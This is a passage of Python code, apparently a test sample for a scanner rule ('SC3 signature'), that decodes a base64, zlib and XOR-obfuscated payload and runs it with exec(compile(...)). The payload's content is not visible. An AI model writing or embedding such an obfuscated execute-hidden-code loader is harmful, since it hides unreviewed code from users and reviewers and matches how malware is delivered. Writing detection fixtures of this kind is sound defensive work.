X63TH/BtbyfVe7O7pc8JN+P3/eZ/pX/vO9TY2RxJuR4Gp7YbXmoV24YhRB+9Uy/+wtcBbPqVabZgJ955Y5D1+Be/nYC03u9DyBcf0jQUbzCqoD2tVREapHwudKGcyTun+RU8v8Szf4gjJZ8J2bEtvw72Dx/zfQ5gLWZ+f/wJWOmSZg=="
_K = bytes.fromhex("84710e8cf3501871bf2af618")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
